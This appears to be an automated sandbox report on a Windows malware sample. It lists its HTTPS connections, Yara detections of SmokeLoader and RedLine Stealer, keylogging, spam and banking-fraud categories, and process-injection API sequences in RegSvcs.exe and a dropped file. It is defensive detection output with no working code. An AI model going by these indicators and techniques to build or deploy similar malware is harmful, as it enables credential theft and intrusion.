Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:64814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:64930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:64798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:64810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:64944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:64805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:64817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:64809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:64829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:65205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:64958 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.194.166.146:443 -> 192.168.2.4:65173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:65466 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:65522 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:65457 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:65243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:49187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.46:443 -> 192.168.2.4:49210 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:49287 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:49286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:49349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:49450 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:49433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:50141 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:50294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:50280 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:50433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:50393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:50396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:50340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:50394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:50733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:50392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:50897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:50991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:51023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:50285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:51086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:51091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:51050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.46:443 -> 192.168.2.4:51277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:51042 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:51724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:51467 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:51519 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:51566 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:51525 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:52368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:51986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:52129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:52133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:52201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:53008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:53580 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:53356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:53354 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:53394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:53530 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:53827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:53834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:53853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:53851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:53850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:54193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:54187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:54192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:54191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:54188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:54194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:54448 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:54126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:54121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:55021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:55016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:55223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:55225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:55579 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:55440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:55713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:55704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.46:443 -> 192.168.2.4:55645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:55739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:55700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:55738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:55735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:56249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56455 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:56518 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:56519 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56562 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:56550 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56559 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56657 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56658 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:56580 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:56588 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:56347 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:56133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:56719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:56715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:57453 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:57547 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:57701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:57606 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:57598 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:57689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:57605 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:57702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.194.166.146:443 -> 192.168.2.4:57699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:57697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:58343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:58344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:58374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:58425 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:58447 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:58649 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:58575 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:59131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:59144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:59123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:59135 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:59509 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:59538 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:59694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:59576 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:60182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:59583 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:60471 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:60866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:60805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:61064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:61641 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.xqz8sQ4mZB.exe.6e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.ibjhisi.1f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ibjhisi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.xqz8sQ4mZB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.F6A9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.xqz8sQ4mZB.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.F6A9.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ibjhisi.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.F6A9.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1628585594.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1929092219.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1929134962.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1878296905.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2086345336.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1690470943.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1690637836.0000000002211000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2142714397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2142554421.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Send many emails (e-Mail Spam)

Source: Yara match	File source: 29.3.4E3.exe.3860000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.4E3.exe.2f70e67.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.3.4E3.exe.3860000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.4E3.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.4E3.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.4E3.exe.2f70e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.2220222962.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4256567957.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4252280793.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2228451591.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2142137549.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2173646781.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands

Source: SMTP

Network traffic detected: Mail traffic on many different IPs 19

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000001A.00000002.2142532116.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1690528865.000000000071D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001A.00000002.2142822770.000000000081D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1929092219.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000003.00000002.1929134962.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001B.00000002.2142171453.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.1987043149.0000000005261000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1690470943.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1690454958.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1690637836.0000000002211000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000025.00000002.2228180435.0000000002B72000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002B.00000002.2209552355.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001A.00000002.2142714397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000003.00000002.1928946704.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000003.00000002.1929009378.00000000005CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001A.00000002.2142554421.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000025.00000002.2228451591.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001D.00000002.4256567957.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401590
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015CB
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159B
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015B0
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015BC
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_00401590
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_004015CB
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_0040159B
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_004015B0
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_05420110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	6_2_05420110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD88F0 NtCreateThreadEx,	10_2_04CD88F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044C490 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044C490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044C690 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044C690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00426C90 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00426C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044D040 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044D040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00441140 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00441140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044C1E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004441A0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_004441A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0043A1B0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0043A1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042F330 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0042F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0043A3F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0043A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00444380 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00444380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443440 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00443440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044D400 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044D400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044D5E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443610 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00443610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443810 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00443810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044C8D0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044C8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044DA50 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044DA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443AC0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00443AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044CB30 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044CB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443BF0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00443BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044DBF0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443DC0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00443DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044CE90 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_0044CE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00433F10 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00433F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443FD0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	16_2_00443FD0

